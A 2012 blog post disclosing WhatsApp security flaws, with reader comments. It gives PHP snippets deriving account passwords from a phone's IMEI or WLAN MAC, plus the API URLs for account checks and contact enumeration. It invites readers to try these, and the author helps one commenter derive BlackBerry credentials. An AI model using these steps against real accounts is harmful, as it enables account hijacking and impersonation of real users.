WhatsApp is broken, really broken

WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than ~1billion messages per day has some serious security problems. I will try to give a detailed analysis on some of the issues.

Encryption

Until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. When using WhatsApp in a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software will encrypt messages – without giving any details on what cryptographic methods they are using (so it is safe to assume they did not do it the right way, using Public-key cryptography) . Update: their encryption is broken

However, the users mobile phone number is still being transferred in plaintext: WhatsApp still revealing users phone number after encryption update

Authentication

The authentication is a security nightmare. On Android, the password is a md5 hash of the reversed IMEI number:


$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash

On iOS devices the password is generated from the devices WLAN MAC address:


$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice

The username is the users mobile phone number – an attacker would probably already know the number.

The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the users device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a users WhatsApp account¹. But how? Well, some people have done a excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI

Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse engineered API!

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number (without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)) / Note that the WhatsAPP UDID has nothing to with the Apple UDID - it is something completely different.

If you did everything right, the server will answer with a XML:

<?xml version="1.0" encoding="UTF-8"?>
<exist>
<response status="ok" result="xxxxxxxxxxx"/>
</exist>

Privacy

When WhatsApp starts it will send all numbers from your phones address book to the WhatsApp servers and check which numbers are registered with WhatsApp.

This is done like this:

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4

$countrycode =  the country calling code
$yournumber = while this SHOULD be your number, it is not required, the API will accept any number 
$friendX = phone number (without the country calling code) from the address book that will be checked, u[] is an array so it is possible to check multiple numbers with one request

The server will answer with a XML document showing all numbers (hits) that were registered with WhatsApp, this will look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>P</key>
        <string>1234567890</string>
        <key>T</key>
        <integer>10817</integer>
        <key>S</key>
        <string>Some Status Message</string>
        <key>JID</key>
        <string>23xxxxxxxxx</string>
        <key>NP</key>
        <true/>
    </dict>
</array>
</plist>

Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. Not sure about “JID” (Update: JID ist the JabberID, thanks) and “NP” yet – if you have smart guess let me know. All this information is public.

Local database encryption

Since this requires physical access to the device or a full backup (in both cases you are screwed anyway) this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report

Conclusion

 Do not use WhatsApp. Really, dont.

¹ Actually, you can’t – it’s against the law. That being said: i did not hijack anybody’s WhatsApp account during this research and neither should you. This information is for educational purposes only.

133 thoughts on “WhatsApp is broken, really broken

  1. Fred Grott

    I had the opportunity to interview with these clowns for an android dev role several moons ago..needless to say I gave up after they refused to listen to the above concerns..

    Your concerns have been known for awhile

    Reply
  2. ija

    We should all start using our regular XMPP accounts now! Most of us already have one. If you have a Gmail, Fastmail, Lavabit, GMX, Ovi.com, Yandex email address, you are ready to go. All that’s left to do: Install Xabber or IM+ or sth. alike on your smartphone!

    If you also want to instant message on your laptop: The latest Thunderbird comes with XMPP support! Or give Jitsi or one of the many alternatives a try! Enjoy!

    Reply
    1. ADL Walrus

      Really? Are there any mature, non-Java, cross-platform replacements for Jitsi that provide OTR encryption for Jingle audio and video chatting?

      If so, I’d really like to hear about them.

      Reply
    2. Ramazan

      IM+ is not secure either :). A few months ago, I checked up the packets of IM+ using wireshark, and observed that all your packets are going over a third party server (probably owned by these IM+ guys). I mean, the xmpp packets go to a server, that is not the one that your jabber account resides… Seems like MitM…

      Reply
  3. Pingback: Whatsapp for webos - Page 17 - webOS Nation Forums

  4. Pingback: How to Hack WhatsApp Messenger | Build WhatsApp API Client

  5. Government enemy

    Great article!

    I will continue using WhatsApp though (at least until my iPhone 5 arrives) since there’s currently no alternative with the same amount of users..

    Reply
    1. S

      You are the government’s friend if you only correspond on unencrypted channels. Not a bad thing to be the government’s friend I guess, but definitely not their enemy.

      Reply
  6. Michael Whalen

    These guys maybe “clowns” and their infrastructure might have some pretty interesting security holes… but they have a shit ton of investment money and even more users. They’re doing something right.

    Reply
      1. Faisal Abid

        Having a “shit ton” of investment money doesn’t guarantee a successful future. They keep this shit up and soon they’ll be “pivoting”.. and we all know what that means.

        Reply
      1. marco b.

        The huge success is due to the ability to easily connect with your friend via the cellphone numbers already inside your phone.

        It really give a ton of useful functions with zero effort from the user, so the security is even more a problem.

        I hope they will fix the issue. Meanwhile I use a proxy with a on the fly replace of my number with a bait one just to test.

        peace&love

        Reply
        1. lomifeh

          The same thing they do with a cloned cell phone. Use it for illegal purposes while pinning it on someone else if tracked.

          Reply
        1. Sam

          UDID is the a md5 hash of 2x WLAN Mac and the phone number is being transfered without encryption. There you have everything you got.

          The WhatsAPP UDID ist not to be confused with the Apple UDID.

          Reply
          1. Shant

            If you stay on 3G and home-WiFi (obviously your home-WiFi needs to be encrypted) then you should be safe for now.

  7. Kupsztal

    The super annoying thing is that their most recent update broke the app on iPhone 4s, and they not only seem not to be aware of the problem, but also they’re seem to ignore any messages, twitts, or iTunes comments. Unless they’re going through an acquisition and couldn’t be bothered with users at the moment ;)

    Reply
  8. n00badmin

    It is very important for users to be made aware of this vulnerability, however the reality is, if you avoid public wifi networks it is very unlikely someone could be in a position to sniff your traffic. (not impossible, but unlikely over cell carrier network or on encrypted home access point)

    It has been well documented that whatsapp sends unencrypted traffic yet the reality is they have likely decided the chances of this happening are very small, assuming the encryption of wireless carriers would suffice.

    Reply
        1. Anonymous

          Viber is Israeli. You can bet the Israelis are spying on every single Viber user on earth. Never ever trust an Israeli with anything. Ever.

          Reply
    1. Anonymous

      do not use kakaotalk, cuz its privacy policies are dangerous for security. there was phishing in korea, and almost of the users are annoying of ‘featured friend’ function.

      Reply
  9. Pooja

    i tried hike and i love it. It got all the nice features like group chat,filetransfer and in addition free sms(to India). And it doesnt have any such security issues and respond to their user’s concerns so promptly. but unfortunately its only supports India as of now.

    Reply
  10. zhu

    I think anyone who are communicating information using IM will be using a blackberry. Most people using whatsapp are probably not that concerned with security. But still, it is a big issue that needs to be resolved.

    Reply
  11. Pingback: WhatsApp still sends phone numbers in Plain Text. Encryption is not complete.

  12. Robin

    I have done some research on my own. Mostly looking at the mediasharing function. The images you send are hosted on a public website, you just have to find the URL.

    If someone intercepts your message, he will have that URL, same goes for someone having access to your message database. Even when you’ve deleted the file from your phone.

    For example: I just sent this picture to my girlfriend while sniffing my WIFI. Result is an URL looking like this: https://mms504.whatsapp.net/d6/15/00/6/1/6169eeec03dc50f69456497508a9466c.jpg

    Now what I have found out is that the URL isn’t completely random. In fact, nothing is (with the exception of two unknown values).
    If you’d break it down it comes to this:
    http://mmsservernumber, usually 300,400 or 500].whatsapp.net/[d0-d11 no idea what this is]/[day of upload 00]/[hour of upload 00 pst]/[hash first letter]/[hash second letter]/[hash].jpg

    Anyone any idea on what the D stands for? And what the hash is made of?

    Reply
    1. Alex

      Maybe the D is the month, since it’s 0-11. in your case it’s 6, and you said that you just sent the picture, so I’ll assume that means September. September is the 9th month, and adjusting for 0 style counting that makes it number 8.

      however, just because it isn’t the right number doesn’t necessarily mean it isn’t the month. Maybe they assigned some random order to the months for “Added Security”, which seems like something they would do.

      Reply
      1. Robin

        Thing is: it changes per message. Also I think the way it is setup right now is using day and hour folders, so an image never exists for longer than a month, and they just replace images in a new month. Making server cleanup unnecessary.

        Reply
        1. indrora

          > Doesn’t require server cleanup

          No, it does since this looks to be an MD5 hash (they seem to be fond of those) and thus is unique (to some degree) and unless they’ve done something stupid and said

          $hash = md5($to.$from.date(“%M%D”.time());

          it is highly unlikely that there will be a collision between two messages (and here, you would have to send a lot of photos for them to be inaccessible).

          More than likely, they’ve said

          $hash = md5($to.$from.time().md5_file($file_uploaded));

          which would require you to send the same picture to the same person from the same account at the exact (within 1s) same time.

          Reply
          1. Robin

            Oh yeah you’re right.

            One thing I did notice though is that if you’d upload the same image twice, you get the same URL! Even with some time in between uploads.

      1. Robin

        In this case I just looked it up in the sqldatabase in data/data/apps. However you can sniff it using wireshark and a mitm attack.

        Reply
  13. Pingback: WhatsApp security : frankjordans.com

  14. Manuel

    If you are concerned about your privacy, just don’t use What’s App throught public WiFi networks and don’t share top secret information, this way maybe you will be safe. You also have to consider that WA is a publicity less FREE product that has some security issues you have to deal with.

    Reply
  15. Pingback: Wie Jugendliche WhatsApp nutzen | Schule und Social Media

  16. YousefED

    The Windows Phone 7 client is also completely insecure (the global device id is the password). I was able to create a WP7 app that sends and receives whatsapp messages on the user’s behalf in one evening (it only needs the phone number, which an app cannot directly get from the WP7 SDK).

    However, this means ANY app on a WP7 device only needs to prompt for a user’s phone number and can communicate with WhatsApp on the user’s behalf.

    Reply
  17. Forever

    You cannot hack the account forever.
    In the super rare case that someone would actually be able to apply this in real life, which is very rare and this article really *really* over exaggerates: don’t be afraid users ;), you can always login on another device which then locks in to a new password which is unknown to the malicious user.

    Seriously, while the security is not optimal due to the simplicity for the users, it is not so highly insecure due to the hidden away accs. Basically: the chance of this happening to you is 1 in 250 million.. And that’s even a chance!
    Stop spreading so much nonsense baseless fear ;)

    Reply
    1. Y110

      Oh yes i can always login from another smartphone!
      But that means that if someone hackin your WathsApp account you have to buy a NEW phone!
      Absolutely nonsense baseless fear…

      Reply
  18. Kyhwana

    Wait, isn’t it sending everything via HTTPS? Does it do cert checking?
    (Thinking of intercepting it via wifi against android users)

    Reply
  19. Jakob

    Will Osama bin Ladin kill me because he saw my WhatsApp msg to my girlfriend when I wrote her I’m love with her? No.

    People could hear me talkin in the subway – I don’t care at all. Since I am not Jason Bourne everything is cool.

    Reply
  20. Pingback: Massive Sicherheitslücken in WhatsApp | Juergen Kraemer – NETZWELT

  21. Pingback: Whatsapp security issues. | Information Strategy

  22. Pingback: Drecks WhatsApp! | dreitehabee

  23. zbuk

    The sad thing is when someone hijacks your account there’s nothing to do, the hijacker can start impersonating you etc., even if you don’t use Whatsapp, your friends will just think you started using it like everyone else…

    Reply
  24. Pingback: Neue Sicherheitslücken: WhatsApp gehört gelöscht | Die Sendung mit dem Internet

  25. Pingback: WhatsHacked, WhatsCracked, WhatsSucks? WhatsApp « Subversive Bytes

  26. Pingback: Using WhatsApp is a huge security risk | Doobybrain.com

    1. dexymx

      I have just a very very little dataset (around 4 friends xD), but in this case NP = Android. Anybody out there to disprove that?

      Reply
  27. User773

    Hey,
    is anybody out there who has taken a closer look to WhatsAPI?
    What steps do you’ve taken to work with it? Thank you :)

    Reply
  28. Guest

    It is a simple messaging service. You guys do not work for the CIA, KGB, mosad or any similar organization. The greatest risk involved here is the fact that somebody could get to see what you say to your girlfriend.
    Get over it. There is nothing major at risk. No lives will be put in danger and no money will be lost. WhatsApp is great application. Period.

    Reply
    1. Pyrocolada

      You clearly have no clue how identity fraud works: The info leaked by WhatsApp can be used to get your OTP for your bank account. We’ll see what happens when you complain to the bank that your money is missing, and they say: “Sorry, you made a huge transfer, not our problem.”

      Reply
  29. Pingback: WhatsApp – schlecht verschlüsselt › andronews.de

  30. cityhunt

    NP, in most cases, in coding stands for “Not Provided”, and it’s used as a placeholder/anchor point. Good article btw :)
    UDIDs are not possibly unknown to App sellers/coders, and all this stuff you can sniff with ethereal and tools like that is stored on THEIR server also. Can one of the critics above imagine what this could means? :)

    Reply
  31. Arturo Torres Sánchez

    Do you know how the Blackberry password is generated? I tried with MAC address and got nothing. I was going to use IMEI, but since my phone is CDMA, I’ve got MEID. I tried it too and it didn’t work.

    Reply
    1. fileperms Post author

      Did you try exactly the methods that i posted? Using md5(WLANMAC.WLANMAC) or md5(strrev(IMEI))? I don’t own a Blackberry so i didn’t have the chance to test this yet… if you need help with the md5 stuff please email me: admin@fileperms.org

      Reply
      1. Arturo Torres Sánchez

        I tried md5(WLANMAC.WLANMAC), and md5(rev(MEID)) (which is different from IMEI, I don’t have this). None of them worked. I also tried with Blackberry’s PIN.

        Reply
        1. fileperms Post author

          The BB PIN would have been my next guess, maybe it’s md5(PIN.PIN) or md5(strrev(PIN) – but that’s just guessing. If i get my handy on a BB device i will do some testing.

          Reply
  32. Pingback: Whatsapp Sicherheitslücken: Wieder mal Negativschlagzeilen - Whatsapp, Sicherheitslücke, Whatsapp Hacker - 24mobile Handy Blog für Handys und Handyverträge

  33. kminfo

    whats app works without any bugs in android platform and in the means of processor itz perform amazingly over the 1ghz and the version of androids above 2.2 to till the new one android jelly bean

    Reply
  34. Pingback: Lächerlich: “WhatsApp” unsicher wie ein offenes Scheunentor – Nutzung nicht zu empfehlen | iPhone-Ticker

  35. Pingback: #385 iPhone 5 Adventures, Audio Compression, Getting the Most Out of Finder « Nosillacast

  36. potato

    NP seems to indicate whether the user is using iPhone or Android.
    iPhone clients will not have the NP flag, while Android clients will have NP flag set to true.
    I have no idea what will happen to users using Nokia/Blackberry. I don’t have any whatsapp friend using one of those phones :P

    Reply
  37. Andreas

    Hi there
    Can anybody help me to find the WhatsAPI from venomous? I can’t find it online. Maybe someone of you can send me the file or the link for downloading it?

    Thanks a lot!

    Reply
  38. Pingback: How Not to Design an Instant Messenger « kabelmast

  39. Pingback: BBM vs WhatsApp - BlackBerry Forums at CrackBerry.com

  40. Elspeth Chagall

    You got to love Wireshark.

    But this is scary stuff. If it’s this easy to be able to get to someone’s personal mobile phone info, what’s the point. :( I love Whatsapp but this is very frightening news.

    Reply
  41. Coma

    Any news regarding this issue? The Android app has received several updates since this post, the latest of which (version 2.8.7326) is supposed to include a ”critical bug fix for connection issues”.

    Reply
  42. enought with whatsupp

    Guys, my whatsupp account being hacked today.I never use wifi,only 3g& I got the latest version of it.So I just simply uninstall it&WILL NEVER USE IT AGAIN. It’s hurt when someone pretend to be u & saying something stupid in all of ur wtfgrups.When u go through it then u know it.

    Reply
  43. Harshal

    Is it possible to use whatsapp on 2 device that run android simultaneously?
    i tried the backup restore method over the net but issue i get msg on either of the device not both.. Is is possible to get msg on both the devices??

    Reply
  44. Pingback: Anonymous

  45. Pingback: WhatsApp and Facebook. Is there a future? | Horacio Reyes'

  46. RONZ

    Hi!
    Does anyone outhere know why does the What’s app icon appear twice on galaxy S2, everytime it is downloaded? Could my what’s app get hijacked by simply entering my phone number and having my SIM (from behind my back of course) to receive the security code on it then enter it, and start receiving my messages on the hijacker’s mobile?

    Reply
  47. Pingback: Why Whatsapp is boon and bane at the same time | en.code-bude.net

  48. tommy

    Hi, all

    I tried to use the following url just for fun:
    - https://r.whatsapp.net/v1/exist.php?…
    - https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

    it seems doesn’t function!!!

    So, analyzing the traffic with wireshark, i see the first packet sent to the server from the client that is divided in two parts, the first (FIXED) containt the model of the phone and the telephone number, the second is a “VARIABLE” part that maybe work for the encryption of the session.

    What i have seen is that this second part (variable), change every time a new session from the client to the server START.

    Any idea about the encryption?

    THANKS ALL.

    Reply
  49. Pingback: Whatsapp is broken, really broken | the dirk

  50. Dynasty

    What exactly does it mean that people can take over your account??? Can they have access to your message history? Can they see everything you write and receive after they’ve taken over your account? Can they see all your contacts and their phone numbers?

    I first installed Whatsapp on my Android, and then when I bought a new Smart phone and installed it there. It then, automatically disconnected me from the old phone – so you can’t use the app on two devices at the same time with the same account – so how exactly does the ”hacker” get my private information if s/he doesn’t log in with my account first? Wouldn’t I immediately know if someone else logged inn to my account? Or do they use another program?

    I also read on their support website that they do not recommend people installing whatsapp on different devices with the same phone number or exchanging it between multiple devices because it will eventually block your number from using whatsapp. Is that true?

    Appreciate fast reply – thank you :)))
    Great article! But, unfortunately – articles like these are more unsafe than the app itself… It’s one thing to make someone aware of something bad and a whole other to ”teach” something how to do bad… just saying..

    Reply
    1. fileperms Post author

      Hello there. First: please not this article was written back in September 2012, the WhatsApp Team has fixed some of the flaws that are described here. Although an attacker can not access the message history, he can send and receive message using the hijacked account.

      Reply
  51. KiDo

    Hello , I don’t use whatsapp so I know nothing about it
    But my friend told me that someone added her on whatsapp , and he could hack ALL her phone files , like pictures , messages history …etc
    Even he sent her the pictures as a proof
    SO , , , Is there such thing??? like hacking others phones using whatsapp???
    Is it really possible to be done?

    Reply
  52. Asad

    Hello,

    I am going nuts from past one week as my whatsapp account is returning following error and not allowing to use the application at all:
    “Your phone no …………. Is not allowed to use our service”

    It happened all of the sudden when I was sending broadcast message to all my contacts. A screen appear requesting to verify the phone no and after Adding the phone no it returns above error.

    Have been writing whatsapp support constantly but no response from their end.

    Pls can some one help making my whatsapp work on same phone no.

    Thanks in advance!

    Asad

    Reply
  53. asad

    Hello All,

    can any one guide me how can i solve the following error of whatsapp on my BB9900 as it says my phone number is blocked or something.
    How can i unblock my number and use the whatsapp ?

    Error: Your phone number +xxxxxxxxxx is no longer allowed to use our service.

    i have already wrote to whatsapp support many times but no response even after a week is passed..

    Pls assist

    Reply
  54. Tshepi

    Hello

    Last year November my phone couldn’t send or receive whattsapp messages for about a week it says error. I couldn’t even go in to whattsapp and now 3 people who are my contacts received a strange messages and they all think I send it. I am 100% sure I didn’t send it.
    Do you think my phone was hacked?
    How do I proof to everybody that I didn’t send that message? I am desperate to proof my innocence.

    Reply
  55. Pingback: Krönika: Därför borde du sluta använda WhatsApp | Ajour

  56. Pingback: Threema statt WhatsApp | Jonas Schönfelder

  57. Pingback: Securing VoIP in the Presence of Pervasive Monitoring « Hannes Tschofenig

  58. Pingback: Whatsapp Privacy Snafu - BlackBerry Forums Support Community

  59. Pingback: WhatsApp is broken, really broken | fileperms | senk9@wp

  60. Pingback: Sinnloser Hype: Threema. | laclaro

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>